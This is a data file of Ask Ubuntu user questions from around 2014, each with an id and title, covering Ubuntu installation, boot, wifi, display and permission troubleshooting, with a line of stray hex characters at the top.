dd180050f2020101810003a4000027a4000042435e0062322f00 ie : unknown : bf0c20018031fcffb201fcffb201 ie : unknown : c005000000fcff
478167	trying to get ubuntu 14.04 to install and run !	i am trying to install ubuntu 14.04 . i have downloaded the ubuntu desktop three times and made 2 cd 's and 1 dvd from which to boot . only the dvd boots and installs ubuntu14.04 . but once installed , my keyboard and mouse will not work . i have compared the downloaded files to an how to install help section that shows how many files there should be . i am not getting the right number of files . i have made the cd ; s with infra recorder and they do not even install anything . i made the dvd with roxio easy media creator ! 0 and it works . secondly , i am confused about the certification list . is this listing complete , thus if my motherbaord and cpu are not listed , ubuntu will not work ? ( they are not listed ! ) why would not ubuntu work on any computer motherboard/cpu system ? thank you , please help me . i did n't even check to see if my printo is listed . mobo : asus m2n68am2+ cpu : amd athlon ii x3 455 frankly , i believe in ubuntu . but all i want to do is see it work so i can have a computer again -- a computer without being forced to buy more microsoft windows os 's .
478169	why ca n't firefox run local .swf files ?	my goal is trying to run .swf files through firefox and not a standalone player . when trying to run local .swf files on firefox 29.0 ( currently on 14.04 ) , the browser opens the open with/save file prompt window even if the browser has the flash plugin installed . right-clicking on the file and clicking open with ... > firefox just makes the browser open a new tab and then the prompt to open with/save file again . selecting firefox through that prompt window will still just make firefox open the prompt again on a new tab . when accessing .swf files online , though , they run normally and firefox even shows the lego-looking plugin indicator in the address bar saying that `` adobe flash '' is enabled for the address i 'm accessing the .swf from . in firefox 's preferences ' applications tab , swf files are currently set to `` use shockwave flash ( in firefox ) '' , so i do n't get why it wo n't do what it says for the case of local files . update : apparently , firefox has separate `` shockwave flash file '' entries in the applications tab of its preferences for different mime-types . found a workaround which i entered below .
478171	what is pam.d directory usage	i saw pam.d directory on the etc directory . what is pam and its usage . i saw that for the first time in here . is that for authentication users ?
478179	files are avaliable only when they are executable on ubuntu 14.04	videofiles that i copied from windows ntfs partition are only avaliable when they have at least user execution privileges . when i set permissions to 644 , i got permissions denied . i even ca n't to view them by ls -l : - ? ? ? ? ? ? ? ? ? ? ? ? ? ? codeschool_194.mp4 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? codeschool_195.mp4 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? codeschool_196.mp4 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? codeschool_197.mp4 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? codeschool_198.mp4 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? codeschool_199.mp4 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? codeschool_200.mp4 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? codeschool_201.mp4 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? codeschool_202.mp4 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? cssxcountry_slides.pdf
478181	neither win7 nor ubuntu boot after installing wubi . only a blank screen appears	i installed ubuntu in my laptop with win7 using wubi . it installed successfully . when i rebooted my computer , nothing but a blank screen with a blinking cursor appeared . i opened boot manager but it was already booting from the hard disk . i then changed settings in bios setup -- changed an option saying `` uefi first '' to `` legacy first '' . now , even bios setup and boot manager do n't open . what should i do ?
478184	monodevelop - cant find where to get mvc 4	i recently installed mono develop and got a successful build done in asp.net mvc 3 , but im having problems finding a mvc 4 download or upgrade for mono develop.. can someone help me please ?
478185	how do i disable need to authentication when an app asked for inhibit of shutdown / suspend	i would like to disable so i never get this popup . and also i would like to know what application has asked for it , so maybe i can stop it . does anyone know ? edit : a solution can be found here : http : //askubuntu.com/a/486425/7472
478186	help creating a messagebox notification with yes/no options before an application runs	i started using ubuntu alongside windows about 2 months ago . i 've slowly been adding all of the programs that i use regularly to ubuntu , so that i will eventually be able to do everything in ubuntu that i could on my windows machine . one of the last things i need to migrate over is popcorn time . i have finally installed the application on ubuntu , and i have finally gotten vpnautoconnect installed as well . however , on windows , i have one extra precaution set up : a messagebox that pops up when the popcorn time icon is clicked , which asks whether the vpn is connected or not . if yes is clicked , then the application will execute . if no is clicked , it asks whether the user knows what a vpn is and then asks them to either connect it or get off my computer ( this was useful because my roommate and girlfriend would sometimes watch movies when i was not home , so this was an extra safeguard to make sure they checked ) . i want to make the same messagebox in ubuntu . here is the script i used in windows : returnvalue=msgbox ( `` is the vpn connected ? `` ,4 , '' vpn authentification '' ) if returnvalue=6 then dim objshell set objshell = wscript.createobject ( `` wscript.shell '' ) objshell.run ( `` '' '' c : \users\*********\downloads\popcorn-time\popcorn-time.exe '' '' '' ) set objshell = nothing else if returnvalue=7 then returnvalue=msgbox ( `` do you know what the vpn is ? `` ,4 , '' vpn authentification '' ) if returnvalue=6 then x=msgbox ( `` please connect to the vpn '' ,0 , '' vpn authentification '' ) else if returnvalue=7 then x=msgbox ( `` please get off my computer '' ,0 , '' vpn authentification '' ) end if end if end if end if how would i go about creating this same type of script in ubuntu ?
478188	how can i tell which backport'ed drivers are currently installed on my ubuntu 12.04 lts ?	i have had major problems with my wifi but currently my 12.04 kernel with some backport drivers that i had installed works . now i may need to update the kernel ( minor version change ) and i do n't want to experiment again with 5 different backports . can i tell which version is currently installed ? something like uname -ar but for the backport ? thanks
478192	lubuntu 14.04 with ubuntu 14.04	i recently installed ubuntu 14.04 on two older ( xp ) computers . had issues , so installed lubuntu 14.04 ( via usb , since one of the computers had no dvd drive ) . the program i used to create the usb from an .iso seemed to have only one appropriate option -- installing lubuntu alongside ( partitioned ) ubuntu . since one of my hard drives ( ssd ) is small , i 'd like to reclaim the space used by ubuntu . that may involve doing away with the partition . i 've searched askubuntu , but the relevant questions and answers pertain to earlier versions of the software , and there are disclaimers about using the procedures for later versions . how do ( if i can/should ) get rid of ubuntu ?
478193	how do i get wireless working on an asus x552vl ?	i have a problem with my wireless on my laptop . when i did rfkill list : 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no 5 : phy1 : wireless lan soft blocked : no hard blocked : yes itko @ mitko : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off mitko @ mitko : ~ $ lspci -nnk | grep -a2 0280 03:00.0 network controller [ 0280 ] : qualcomm atheros ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) subsystem : azurewave device [ 1a3b:2c97 ] kernel driver in use : ath9k mitko @ mitko : ~ $ lsmod | grep -e ath9k -e asus asus_nb_wmi 16990 0 asus_wmi 24191 1 asus_nb_wmi sparse_keymap 13948 1 asus_wmi ath9k 164164 0 ath9k_common 13551 1 ath9k ath9k_hw 453856 2 ath9k_common , ath9k ath 28698 3 ath9k_common , ath9k , ath9k_hw mac80211 626557 1 ath9k cfg80211 484040 4 wl , ath , ath9k , mac80211 wmi 19177 3 mxm_wmi , nouveau , asus_wmi video 19476 3 i915 , nouveau , asus_wmi
478196	unable to boot windows 8.1 after installing kubuntu 14.04	i just installed kubuntu 14.04 , and i can not boot into the previously installed windows 8.1 . as i read everywhere , this should n't be a problem : kubuntu should recognize that windows is there . but every time i start kubuntu boots without asking anything . thank you for your answers ! update : i realized that i run a chkdsk on the windows ' partition , and i did n't let it end , so it may be marked as `` unclean '' as written here : problem to enter in ntfs partition still struggling to make it work , though .
478201	ubuntu 14.04 on hp chromebook 11	hey guys i was wondering if i can install ubuntu 14.04 on my new hp chromebook 11 . i like the chrome os but i would prefer to have ubuntu on it . i was reading online and somebody said that it only works with intel and not arm .
478202	desktop is too big for my screen	i have an acer widescreen monitor set at 1024x768 running ubuntu 12.04.4 precise , i have adjusted the resolution to match in display settings however the ubuntu side bar and files are all enlarged . its like it has zoomed in . i have read through all other related posts and can not come up with a fix . the desktop was fine up until 3 days ago then it changed and i have no idea why , can someone help ? thanks
478203	ubuntu 14.04 not starting gui without monitor	i need the graphics to be loaded so it 's possible to use vnc or teamviewer for remote graphical access . i guess that 's why teamviewer is not connecting correctly . i have full ssh access so i can edit it all .
478205	upgraded 12.04 to 14.04 , splash gets stuck at `` restoring resolver state ... ''	i just upgraded from 12.04 to 14.04 and i kept getting stuck at the splash screen . i turned off quiet splash and it seems to be hanging after `` restoring resolver state ... '' the only solution i 've been able to find is to re-install ubuntu , but i really do not want to have to do that ! any ideas ? i have still not solved this issue and it is quite frustrating . is there something i can do to give more information ?
478210	ubuntu 14.04 not booting after installing updates	i installed ubuntu 14.04 without any problems and then i gave the system update option . after all the packages were downloaded and stuff , i was asked to restart the system , but after that , it is not opening . i get a black screen with call traces after i choose ubuntu in the grub . any help would be appreciated ! this is the error message :
478215	upgrading from ubuntu 12.04 to 14.04 for better wifi connection - any problems to be expected ?	since upgrading from ubuntu 10.04 to 12.04 on my acer aspire one d270 i have problems with wifi-connectivity . i was planning now to upgrade to ubuntu 14.04 hoping to solve this problem . on reading the last bunch of questions posted here i find quite a few regarding problems which arose after installing ubunto 14.04 . would like to get opinions - is it worth upgrading yet or are to many problems to be expected ?
478216	grub2 not working after installing xubuntu 14.04	i have a vaio laptop and it used to have installed windows 8 and xubuntu 13.04 in dual boot , everything was working fine . i decided to update my version of xubuntu 14.04 lts mainly because the support for 13.04 is finished and lts version have 3 years of support . what i did was to format the partition where xubuntu 13.04 was installed and install 14.04 in that formated partition . when i restarted my computer willing to start using my new system i got the following message : error : symbol 'grub_term_highlight_color ' not found and i was not able to enter any os . i tried boot-repair from live usb more than two times and it did not fix the problem . i tried to enter to my computer using super grub2 disk , however it does not apperar to work with uefi active ( besides super grub2 disk says it can ) i only get the message `` no operating system found '' . if i boot super grub2 disk with uefi disabled , super grub2 disk can not detect any os , i also tried rescatux distro , however , as of super grub2 disk , rescatux can not enter when uefi is active . i tried boot-repair with the option of `` restore efi backups '' , after that i was able to boot on windows , but no grub menu appeared . i ran boot-repair again with no improving results here is the last bootinfo report i got : http : //paste.ubuntu.com/7609801/ do you have any idea of what is happening ? i really appreciate your help , best regards , update hi and thanks for your suggestions . i was able to enter my different oses using refind ( secure boot disabled ) , however , after different tries i was not able to get a boot menu ( either grub or refind ) to select an os : ( i tried to install refind in my hard disk , however , when booting it goes directly to windows . i tried again boot repair , nothing happen . i tried dpkg-reconfigure , nothing happen . here is the last bootinfo summary i got . http : //paste.ubuntu.com/7651147/ the only way for now to enter xubuntu in my computer is using refind usb with secure boot disabled . thanks for your help , any comment is appreciated
478218	which version ubuntu for toshiba nb500	what do you think , toshiba nb500 ( 1024 mb ddr2 , atom 1,66 ghz - pseudo 64bit ) can cope with ubuntu 14.04 ? if no - which version of ubuntu i can use , if i want to work comfortable ? i would like some unity - if possible .
478219	can not delete .trash-503 directory , returns a $ recycle.bin.trashinfo : input/output error	i can not delete .trash-503 folder via gui or terminal , it returns a $ recycle.bin.trashinfo : input/output error not even sudo rm -r or even a simple ls works in that trash directory . check terminal output below : subroot @ subroot : ~ $ cd /media/xxxxx/ subroot @ subroot : /media/xxxxx $ rm .trash-503/ rm : can not remove `.trash-503/ ' : is a directory subroot @ subroot : /media/xxxxx $ rm -r .trash-503/ rm : can not remove `.trash-503/info/ $ recycle.bin.trashinfo ' : input/output error rm : can not remove `.trash-503/info/found.000.trashinfo ' : input/output error rm : can not remove `.trash-503/info ' : directory not empty subroot @ subroot : /media/xxxxx $ sudo rm -r .trash-503/ [ sudo ] password for subroot : rm : can not remove `.trash-503/info/ $ recycle.bin.trashinfo ' : input/output error rm : can not remove `.trash-503/info/found.000.trashinfo ' : input/output error subroot @ subroot : /media/xxxxx $ cd .trash-503/ subroot @ subroot : /media/xxxxx/.trash-503 $ ls info subroot @ subroot : /media/xxxxx/.trash-503 $ cd info/ subroot @ subroot : /media/xxxxx/.trash-503/info $ ls ls : can not access $ recycle.bin.trashinfo : input/output error ls : can not access found.000.trashinfo : input/output error found.000.trashinfo $ recycle.bin.trashinfo subroot @ subroot : /media/xxxxx/.trash-503/info $ what 's going on here and how can i delete this folder ? edit i tried checking and repairing the partition using gparted only to get this error message : error : filesystem check failed ! error : 264 clusters are referenced multiple times . ntfs is inconsistent . run chkdsk /f on windows then reboot it twice ! the usage of the /f parameter is very important ! no modification was and will be made to ntfs by this software until it gets repaired . i do n't have windows installed , how can i run chkdsk /f from ubuntu ?
478225	how to tell if my home is encrypted or not ?	i have installed ubuntu 14.04 a while ago and can not remember whether i chose to have my home folder encrypted or not . how can i find out easily whether my own home on my machine is encrypted ( while i am logged in ) ?
478227	how to auto poweroff after ubiquity preseed install of ubuntu desktop	i have remastered a normal desktop amd64 iso you can officially download . with the following contents of isolinux/isolinux.cfg the preseed works fine : default live label live menu label ^start kubuntu kernel /casper/vmlinuz.efi append file=/cdrom/preseed/kubuntu.seed boot=casper noninteractive initrd=/casper/initrd.lz quiet splash -- but in the end the preseeded poweroff ( d-i debian-installer/exit/poweroff boolean true ) does not take place , instead when the installer is finished the desktop session is started . i have tried setting various combinations of the following preseed options , but it always starts the desktop session in the end : d-i finish-install/reboot_in_progress note d-i debian-installer/exit/halt boolean true d-i debian-installer/exit/poweroff boolean true info : i have inserted all preseed lines in preseed/kubuntu.seed
478228	update information outdated , `` failed to fetch cdrom ''	i have a warning triangle on the top of my screen . when i click on it , it says that my update information is outdated . when i type sudo apt-get update & & sudo apt-get upgrade into a terminal , i get this message : w : failed to fetch cdrom : //ubuntu 14.04 lts _trusty tahr_ - release i386 ( 20140417 ) /dists/trusty/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 14.04 lts _trusty tahr_ - release i386 ( 20140417 ) /dists/trusty/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . any ideas ?
479226	arrow keys and delete key not working	i opened my laptop today to find that my arrow keys , excluding the left arrow , and delete key are not functioning correctly . the down arrow brings up the notification that the trackpad was disabled , the delete key brings up the notification that the trackpad was enabled , and the up and right arrows do n't seem to do anything . i 'm running ubuntu 14.04 , i have an acer laptop , and the keyboard model is set to generic 105 key ( intl ) pc . the keyboard language is set to english ( us ) . i tried changing the model to a few different ones , but it did n't solve the problem . i noticed that a lot of people had this problem in the past , but i could n't find a solution for myself . if you experienced this problem recently , how did you solve it ? or do you have any ideas on how i may fix it . also , i have ubuntu installed as my operating system and am not using a vm .
479229	14.04 ar9k wireless driver reclaim	i 'm assuming that at some point i may have mistakenly assigned the wrong driver to my wireless card while attempting to boost signal strength . is there any commands that would allow me to reclaim my wifi card and set the correct drives ? it took a minute to find it , but i think this is the command that did it . sudo apt-get install firmwire-b43-installer b43-fwcutter which did not install , or this one , sudo apt-get remove bcmwl-kernel-source in the windows driver installer the files were netathr.inf and netathrx.inf . the program marked them with an error of which i ca n't remember . i have re-installed bcmwl-kernel-source and nothing . i do n't even know if it is related to my problem . my card is network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) . i have ubuntu 14.04 lts in which i have just upgraded to in hopes that it would fix this same problem i experienced in 12.04 lts . i 'm currently running wifi from a usb controller , but i need the internal card to work because this wifi usb controller is not mine , nor is it small . it is very large for what it is and i would much rather have my laptop work like it is supposed to . sudo lshw -c network *-network unclaimed description : network controller product : ar9285 wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:07:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0100000-f010ffff in case more info is needed . rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no nmcli nm running state wifi-hardware wifi wwan-hardware wwan running connected enabled enabled enabled enabled iwconfig without usb controller eth0 no wireless extensions . lo no wireless extensions . what can i do to resolve this issue at hand ? i have entered the following code with no result . sudo apt-get install linux-firmware-nonfree wicd wicd-gtk wicd-daemon wicd-cli wicd-curses
479230	14.04 - wireless bad connectivity , slow speeds	i 've tried everything from this article , nothing helped . it 's very slow while downloading , and randomly spikes up every once in a while . something interesting i did find is after trying sudo rmmod iwlwif , i got `` module iwlwifi is not currently loaded . '' any ideas ? thanks in advance , and i know there have been plenty of questions like mine , but none of their solutions helped . if it helps at all , i have an atheros card in a laptop .
479231	ca n't make a wireless hotspot ubuntu 13.04	i installed hostapd to make a wireless hotspot , but it always fails and i get this message : failed to update rate sets in kernel module the reason is that the wireless led is always on which means some other app is using the wireless . how can i stop that unknown app and get my wireless hotspot working again ?
479233	recover files deleted from eclipse on ubuntu 12.04 64bits	i was working in eclipse when i clicked delete to only 1 project , and it deleted all of them on my workspace . could i recover data being a non specific extension ? ? ( i want to recover png , xml , class , package ... ) . thanks in advance .
479236	how can i use ssmtp to send through gmail and accept relay requests from another machine ?	i 'm running ssmtp on ubuntu 12.04 and 14.04 and it 's sending emails perfectly through gmail . however , i 'm also running an omnios operating system ( a spinoff of solaris ) and it does n't handle tls which means it ca n't connect and send through gmail . what i 'd like to do is point the omnios machine to one of my local ubuntu machines , and have the ubuntu machine relay all of the email for the omnios machine . how can i accomplish this ?
479237	trying to download ubuntu 14.04 with imgburn ; received i/o error !	so i 'm trying to download ubuntu with a cd-r , but i got an error message . i ca n't place a picture , because i need 10 reputation , but here is a picture the download is at 99 % , and i clicked try again , but it failed three times now . what is the issue ?
479240	bookmark in main menu bar ?	ubuntu 12.04 i somehow wound up with a bookmark for a web page on my main menu bar ( the one at the top of the desktop with `` applications '' and `` places '' ) how can i delete it , or add other bookmarks ?
479242	browsing is slow on lan but works fine on wireless	internet works perfectly on every other router , but browsing sucks at home ( slow browsing and slow loading times ) . i changed dns servers to 8.8.0.0 , still does n't help . and funnily , download speed is extremely high on this network ( meaning torrents for example ) , but using browsers and loading websites is extremely slow ( only on this network ) . do i need to change something in router settings or what can i try ? by the way , i use wired connection to router . also , there 's problem with the whole computer , it is much slower overall . edit : there 's no problem when using windows . edit : $ ifconfig eth0 link encap : ethernet hwaddr f2:4d : a0 : c0:3f:4c inet addr:192.168.11.8 bcast:192.168.11.255 mask:255.255.255.0 inet6 addr : fe80 : :f24d : a2ff : fec6:3f4c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:206798 errors:0 dropped:0 overruns:0 frame:0 tx packets:219570 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:76680734 ( 76.6 mb ) tx bytes:21738160 ( 21.7 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:160 errors:0 dropped:0 overruns:0 frame:0 tx packets:160 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11094 ( 11.0 kb ) tx bytes:11094 ( 11.0 kb ) $ ping -c 2 4.2.2.2 ping 4.2.2.2 ( 4.2.2.2 ) 56 ( 84 ) bytes of data . -- - 4.2.2.2 ping statistics -- - 2 packets transmitted , 0 received , 100 % packet loss , time 1007ms $ ping -c 2 google.com ping google.com ( 213.159.32.147 ) 56 ( 84 ) bytes of data . 64 bytes from lan-213-159-32-147.kns.skynet.lv ( 213.159.32.147 ) : icmp_seq=1 ttl=61 time=0.936 ms 64 bytes from lan-213-159-32-147.kns.skynet.lv ( 213.159.32.147 ) : icmp_seq=2 ttl=61 time=0.937 ms -- - google.com ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1001ms rtt min/avg/max/mdev = 0.936/0.936/0.937/0.030 ms
479243	ubuntu 14.04 : low screen resolution	i installed ubuntu 14.04 on my toshiba dx1210 and have not been able to change the screen resolution from 1280x1024 when the specs say that it supports 1920x1080 . i have tried installing the drivers for the intel hd graphics 3000 graphics card ( v1.0.5 ( 64bit ) from : 01 ) which did not have any effect . i have tried running xrandr and adding a new mode but have not been able to get this to work as when i try to switch to the new mode there is an error ( i think because it is above the `` maximum '' of 1280x1024 ) . here is the output of xrandr : failed to get size of gamma for output default screen 0 : minimum 1280 x 1024 , current 1280 x 1024 , maximum 1280 x 1024 default connected primary 1280x1024+0+0 0mm x 0mm 1280x1024 77.0* i only have the one monitor which has a built in display and am not using any software such as virtualbox . i had some trouble installing ubuntu and eventually figured out that the nomodeset option needed to be set . i have tried disabling it after installing those drivers but the display did not work ( blank screen after the ubuntu logo when booting ) and needed to re-enable it again to log in . how can i get my system to fully accept the drivers i installed ?
479246	[ help ] how to modify icons position in unity launcher	sorry for my poor english , but : i would like to modify the launcher to make it so : this happens when the launcher is loaded in autohide mode . where are the files with these settings ? i suppose i can set the settings when the launcher is loaded into the normal mode .
479249	is it possible to have kcrash/crashdump switch to a vt when dumping ?	i 've set up linux-crashdump to debug issues with lockups by following the instructions here : https : //help.ubuntu.com/12.04/serverguide/kernel-crash-dump.html however , when i try to test using : echo c > /proc/sysrq-trigger , my screen just goes blank . this happens if i 'm in x or even if i 'm in vt1 . does it have to do with the fact that my vt is in framebuffer mode ? when i try the crash i have no idea if the dump is working or if my system is just frozen . when a crash does occur , i 'd like to have some indication that something is still going on . is there a way to configure kcrash to switch to a non-framebuffer vt when dumping ? or is this technically impossible ?
479254	ubuntu 14.04 wake up immediately after suspend	my laptop is toshiba m840 . when i suspend , my laptop auto resumes immediately . i used acpitool to check what devices made my computer waking up . after i disable the xhc , my computer suspends properly . but after restart , the xhc was enabled . how can i disable it forever ?
479255	alternative for wkhtmltopdf ?	question : are there alternatives to wkhtmltopdf ? why : wkhtmltopdf is converting my css wrong , do not show the background property of a div
479256	another guvcview issue ? core dump !	guvcview is core dumping with my sony handycam plugged in . it works fine with my standard logitech webcam . i deleted the config file so it could re-create it . here is the output : $ guvcview guvcview 1.5.3 could not open /home/rayj/.guvcviewrc for read , will try to create it write /home/rayj/.guvcviewrc ok alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started video device : /dev/video0 error opening v4l2 interface for /dev/video1 init . stk1160 ( location : usb-0000:00:1d.0-1.5 ) { pixelformat = 'uyvy ' , description = '16 bpp yuy2 , 4:2:2 , packed ' } vidioc_enum_framesizes - error enumerating frame sizes : inappropriate ioctl for device unable to enumerate frame sizes . : inappropriate ioctl for device { pixelformat = 'rgb3 ' , description = 'rgb3 ' } { ? gspca ? : width = 720 , height = 480 } fmtind:2 fsizeind : 1 { pixelformat = 'bgr3 ' , description = 'bgr3 ' } { ? gspca ? : width = 720 , height = 480 } fmtind:3 fsizeind : 1 { pixelformat = 'yu12 ' , description = 'yu12 ' } { ? gspca ? : width = 720 , height = 480 } fmtind:4 fsizeind : 1 { pixelformat = 'yv12 ' , description = 'yv12 ' } { ? gspca ? : width = 720 , height = 480 } fmtind:5 fsizeind : 1 vid:05e1 pid:0408 driver : stk1160 checking format : 1196444237 format unavailable : 1196444237 . init v4l2 failed ! ! init video returned -2 trying minimum setup ... segmentation fault ( core dumped )
479257	boot from ubuntu iso on a hfsplus partition ( macbook pro )	i would like to be able to boot from an iso stored on an hfs+ partition ( the main partition on my macbook pro ) . here is what i 've done so far : grub > insmod hfs , grub > insmod hfsplus grub > insmod loopback grub > insmod part_gpt grub > insmod iso9660 grub > loopback loop ( hd0 , gpt2 ) /location/to/img.io grub > configfile ( loop ) /boot/grub/loopback.cfg ... this does not work . tab-complete of the ( loop ) path does not work . performing an : grub > ls ( loop ) shows `` unknown filesystem type error ) however , this does work ( tab-complete and all ) if the iso comes from my ext3 partition ( correctly sees filesystem type as iso9660 ) for particular reasons , i ca n't have the iso images on the ext3 partition , they need to be kept on the hfs+ partition . what should be done ?
479260	cmake can not find pythonlibs	i am trying to build inria graphite on my ubuntu which is running in a virtualbox simulator , i follow the instructions , and install the python-dev packages , but when i run cmake , still got an error : cmake error at /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:108 ( message ) : could not find pythonlibs ( missing : python_libraries python_include_dirs ) ( required is at least version `` 3.2 '' ) call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:315 ( _fphsa_failure_message ) /usr/share/cmake-2.8/modules/findpythonlibs.cmake:208 ( find_package_handle_standard_args ) src/packages/ogf/gel_python3/cmakelists.txt:11 ( find_package ) i checked the /usr/lib/ and find tintin @ tintin-virtualbox : /usr/lib $ find . -name `` libpython* '' ./x86_64-linux-gnu/libpython3.4m.so.1.0 ./x86_64-linux-gnu/libpython2.7.so.1.0 ./x86_64-linux-gnu/libpython3.4m.a ./x86_64-linux-gnu/libpython2.7.a ./x86_64-linux-gnu/libpython3.4m.so ./x86_64-linux-gnu/libpython2.7.so ./x86_64-linux-gnu/libpython2.7.so.1 ./x86_64-linux-gnu/libpython3.4m.so.1 so why cmake can not find the pythonlibs , or how should i deal with this ?
479264	replace android on hp slate 21 ?	i want to replace android with ubuntu for androids on my new hp slate 21 . as far as i known none has ever tried it yet and i would appreciate if ask ubuntu would help out here . would i need to unlock & root first my machine ? ( in which case i will need a second machine plugged to my slate ... ) or can i just insert the bootable usb with the distribution i need and go from there as in a normal non-optical drive situation ? also where can i find the downloadable file/image of ubuntu for android as describe here ? i see no link with the name on it.. should i just download the normal dis and choose from options when installing it ?
479265	how do i remove nitrogen back to ubuntu 's default wallpaper manager ?	i was using nitrogen when i using openbox , but now i 'm trying to stop it from setting the wallpaper so i can use the ubuntu default ( i.e via the system settings panel ) . what i 've done so far : sudo apt-get remove nitrogen removed nitrogen configs at ~/.config/nitrogen/ checked to make sure that draw_background in /desktop/gnome/background was checked so far it still does n't work . i ca n't right-click on the desktop , so i 'm guessing that i 've missed something to get nautilus back to drawing icons on the screen . any help is much appreciated . thanks !
479266	why does unity not extend to my 2nd monitor , even when it is displaying an x-screen ?	i recently added a 2nd video card to my system , but unity refuses to extend my desktop over to the second screen . although the secondary monitor initialises when i boot and i can move the mouse cursor over to the 2nd screen , the screen is otherwise blank ( showing no wallpaper or interface elements ) and i am unable to move any windows to this monitor . moving the mouse cursor over to the 2nd monitor changes it from the default cursor to the old-style x cursor , such as the one that appears when you run x-kill , indicating that this screen is initialised in the x server but that unity is not recognising it . although the nvidia x server settings application can see both monitors , the unity systems settings application does not detect the 2nd adapter . sometimes the additional drivers application can see both adapters , but it does n't consistently show options for them both . xrandr also fails to detect the 2nd monitor , but inex lists both adapters . i have experimented with several different drivers for each adapter and with setting each of the graphics cards as the primary adapter in the bios , but this has made little difference . the two adapters are an onboard geforce 8200 and a pcie geforce 7200 gx . the onboard adapter is currently set as the primary , however this adapter crashes whenever i use the nouveau driver and i have to switch over to the pcie as a primary whenever i purge the proprietary drivers ( switching back when the 304 driver has been reinstalled ) . it does n't matter which adapter i set as my primary , the results are the same : one screen showing the unity interface and one screen showing an x-screen that only displays the mouse cursor . all i want is to be able to run this system in a dual screen configuration . i am not a gamer , nor do i require 3d rendering capabilities . anything you can suggest to get the desktop to extend across both screens will be massively appreciated !
479269	ctrl + f4 opening tty in lenovo g400s	i 've just installed my lenovo g400s with ubuntu 14.04 64bit . the problem is when i want to close tab by pressing ctrl + f4 , it open tty and i can not go back to desktop although i press ctrl + alt + f7/f8 . how to resolve this problem ? and one more thing , i want to make fn key usable , because it 's no need to press fn key to use special function in f1-f12 now . thank you all .
479270	repartitioning in 14.94 to add home partion	i have 32 bit 14.04 installed as the only os on a older toshiba laptop . unfortunately , when i installed it i did not set up a \home partition , which i had intended to do . what i want to do is to set up a \home partition and to transfer the files in my current \home directory to it . i have a 14.04 live cd , so i could reinstall 14.04 . i also have gparted on a live cd . if i use gparted , i need precise instructions about how to proceed . i have plenty of disk space ( 200 gb ) for either alternative and know how to decide space allocation for linux partitions . how should i proceed ? thanking you in advance . chaim frazer
479271	mnt/sdb1 is not ready or present press `` s '' to skip `` m ''	i installed ubuntu 14.04 and all was well until a recent update mess things up . now when i boot up it get stuck at mnt/sdb1 is not ready or present press s to skip m to manually repair plus another choice . if i select m you get to a dead end and have to reboot . i usually skip to boot . the other choice gets me to the boot screen where you can choose ubuntu and other choice . right next to u the ubuntu choice i see *ubuntu that is very strange . can you help ? i do n't want to reinstall .
479286	14.04 not authenticating on chsh command	i am trying to change my default shell to zsh . i have the entry placed correctly in /etc/shells file . each attempt i have made with this command has ended with the same error message : chsh -s $ ( which zsh ) password : # # # after entering the correct password chsh : pam : authentication failure sudo chsh -s $ ( which zsh ) # # yields the same result i have used sudo for other commands to be sure it was not a password failure , and every other command has worked but nothing works with `` chsh '' . totally stumped . additional information : i have appended a line per oli 's suggested code to the /etc/shells file . echo $ shell /bin/bash sudo chsh -s /usr/local/bin/zsh password : chsh : pam : authentication failure chsh -s /usr/local/bin/zsh you may not change the shell for 'username' still can not change shell .
479287	ubuntu 12.04 to 14.04	i got a dvd which , among other files , has ubuntu14.04 iso ( in short , it is not a dvd with just the iso ) . i am running ubuntu 12.04 . how can i try out 14.04 without affecting my 12.04 installation ? the dvd does have wubi.exe too , but i ca n't use that in ubuntu , right ?
